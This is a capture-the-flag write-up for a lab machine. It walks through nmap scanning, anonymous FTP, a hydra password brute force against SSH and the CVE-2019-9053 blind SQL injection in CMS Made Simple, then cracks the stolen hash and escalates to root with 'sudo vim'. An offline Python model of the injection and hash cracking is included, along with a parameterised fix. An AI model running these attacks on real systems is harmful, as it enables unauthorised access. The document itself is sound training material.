Simple CTF

TARGET IP --> 10.10.120.214

Task 1: How many services are running under port 1000?

  • Use nmap for a quick scan of the default ports.

nmap [Target IP]
  • Two services show up under port 1000: FTP (21) and HTTP (80).

nmap -sV -sC [Target IP]
  • The script and version scan shows that anonymous FTP login is allowed and that SSH is running on the non-standard port 2222.

Task 2: What is running on the higher port?

  • After running the script scan and version scan with nmap I found that port 2222 is running SSH. See the notes above.

Task 3: What's the CVE you're using against the application?

  • First I tried the web server on port 80. It shows the default Apache web server page.

  • Wappalyzer identifies the web server as Apache 2.4.18 on Ubuntu.

  • Next I checked the robots.txt file that the nmap script scan reported.

  • It references a directory named /openemr-5_0_1_3 and a possible user named mike.

    • The directory doesn't actually exist on the server.

  • I then logged into the FTP service with the anonymous account (any password is accepted), browsed around and found a file.

ftp [Target IP]
  • Use the get command to download the file to the local machine.

get ForMitch.txt
  • Cat the file to view it.

cat ForMitch.txt
  • The note says the system user's password is really weak, so it is a good candidate for a wordlist attack.

  • Let's run hydra against the SSH server on port 2222 with the rockyou wordlist. If the server starts dropping connections, lower the number of parallel tasks with -t (for example -t 4).

hydra -V -l mitch -P rockyou.txt ssh://[Target IP]:2222
  • It returned valid credentials for mitch.

    • mitch:secret

  • Now let's log into SSH account with Mitch's credentials:

ssh -p 2222 mitch@[Target IP]
  • The intended answer to this task is gaining access to mitch's account through the web application rather than over SSH. To do this, run gobuster against the web server to discover the application's directory, which leads to a login page.

  • I actually had to look up another person's write-up to see how they did it.

  • The discovered directory hosts CMS Made Simple 2.2.8, with its own login page.

  • Searching for vulnerabilities in this version shows an entry on Exploit-DB.

  • It is tracked as CVE-2019-9053.

  • The PoC script uses a blind SQL injection to pull the CMS user's username, salt and password hash out of the database. The stored hash is md5(salt + password), so it can be cracked with hashcat mode 20 (md5($salt.$pass)) and a wordlist to recover Mitch's password.

Task 4: To what kind of vulnerability is the application vulnerable?

  • The Exploit-DB entry for the CVE shows that the application is vulnerable to SQL injection (SQLi); the PoC is a time-based blind SQL injection.
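The two steps the PoC automates, extracting the salt and hash through the injection and then cracking md5(salt + password), are modelled below as an added example (this is not the page's or the Exploit-DB script's code). To run offline it uses an in-memory SQLite database with a constructed news table and users table, and a boolean oracle (does the injected query return rows?) in place of the real PoC's time-based sleep oracle; the extraction loop is the same character-by-character binary search. Table and column names, the salt and the wordlist are all constructed stand-ins, and only the password "secret" mirrors the write-up. A parameterised version of the query is included beside the injectable one.

```python
"""Offline model of blind SQL injection extraction followed by a
md5(salt + password) wordlist attack. Added example; all data is constructed."""
import hashlib
import sqlite3

# Constructed sample data (not values from the target). Only PASSWORD
# mirrors the write-up; the salt and wordlist are made up for the demo.
SALT = "1dac0d92e9fa6bb2"
PASSWORD = "secret"
PASSWORD_HASH = hashlib.md5((SALT + PASSWORD).encode()).hexdigest()
WORDLIST = ["password", "123456", "letmein", "mitch", "secret", "admin"]


def build_db():
    """In-memory stand-in for the CMS database: a news table plus a users
    table holding username, salt and md5(salt + password)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cms_news (news_id INTEGER, title TEXT)")
    conn.execute("INSERT INTO cms_news VALUES (1, 'Welcome')")
    conn.execute("CREATE TABLE cms_users "
                 "(user_id INTEGER, username TEXT, salt TEXT, password TEXT)")
    conn.execute("INSERT INTO cms_users VALUES (1, ?, ?, ?)",
                 ("mitch", SALT, PASSWORD_HASH))
    conn.commit()
    return conn


def vulnerable_news_count(conn, idlist):
    """Deliberately injectable: the id list is concatenated into the SQL
    text the way an unsanitised request parameter would be."""
    sql = "SELECT count(*) FROM cms_news WHERE news_id IN (" + idlist + ")"
    return conn.execute(sql).fetchone()[0]


def safe_news_count(conn, ids):
    """Hardened counterpart: every id must parse as an integer and the
    values are bound as parameters, so no SQL can be smuggled in."""
    ids = [int(i) for i in ids]
    placeholders = ",".join("?" * len(ids))
    sql = "SELECT count(*) FROM cms_news WHERE news_id IN (" + placeholders + ")"
    return conn.execute(sql, ids).fetchone()[0]


def oracle(conn, column, pos, threshold):
    """True iff the code point of character `pos` of cms_users.<column>
    exceeds `threshold`. The payload closes the IN (...) list and ORs in a
    subquery, so the count is non-zero exactly when the comparison holds.
    The real PoC asks the same question with a sleep() and measures time."""
    payload = ("0) OR ((SELECT unicode(substr({col}, {pos}, 1)) "
               "FROM cms_users LIMIT 1) > {thr}"
               .format(col=column, pos=pos, thr=threshold))
    return vulnerable_news_count(conn, payload) > 0


def extract(conn, column, max_len=64):
    """Recover a column value one character at a time by binary search over
    the ASCII range (7 oracle queries per character). Past the end of the
    string unicode('') is NULL, every comparison is false and the search
    bottoms out at 0, which ends the loop."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, column, pos, mid):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        out += chr(lo)
    return out


def crack_salted_md5(salt, target_hash, wordlist):
    """What hashcat mode 20 (md5($salt.$pass)) does for a single hash."""
    for word in wordlist:
        if hashlib.md5((salt + word).encode()).hexdigest() == target_hash:
            return word
    return None


def run():
    """Full chain: extract username, salt and hash, then crack the hash."""
    conn = build_db()
    username = extract(conn, "username")
    salt = extract(conn, "salt")
    pw_hash = extract(conn, "password")
    return username, salt, pw_hash, crack_salted_md5(salt, pw_hash, WORDLIST)


if __name__ == "__main__":
    print(run())
```

The extraction costs about seven requests per character, so a 32-character hash plus its salt takes a few hundred requests; against the real time-based oracle each of those requests also carries the sleep delay, which is why the PoC is slow. The hardened query shows the fix in one line: integer validation plus bound parameters removes the injection point entirely.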

Task 5: What's the password?

  • Based on the hydra attack in Task 3, Mitch's password is secret. Cracking the hash pulled out through the SQL injection gives the same password.

Task 6: Where can you log in with the details obtained?

  • We can log into SSH on port 2222 with these credentials.

Task 7: What's the user flag?

  • Cat the flag file in mitch's home directory.

cat /home/mitch/user.txt
  • G00d j0b, keep up!

Task 8: Is there any other user in the home directory? What's its name?

  • Change out of mitch's directory into /home and list it; there is another user called sunbath.

Task 9: What can you leverage to spawn a privileged shell?

  • Once logged in as mitch, check what sudo privileges the account has.

sudo -l
  • This shows that mitch can run vim as root through sudo.

  • Next, check GTFOBins for the vim sudo privilege escalation. Because vim can run shell commands, being allowed to run it as root is equivalent to a root shell.

  • So let's use the GTFOBins command to spawn a shell from vim as root.

sudo vim -c ':!/bin/sh'
  • You now have a root shell; confirm it with id.

Task 10: What's the root flag?

  • Once you have root access, cat the root.txt file in /root.

cat /root/root.txt
  • W3ll d0n3. You made it!
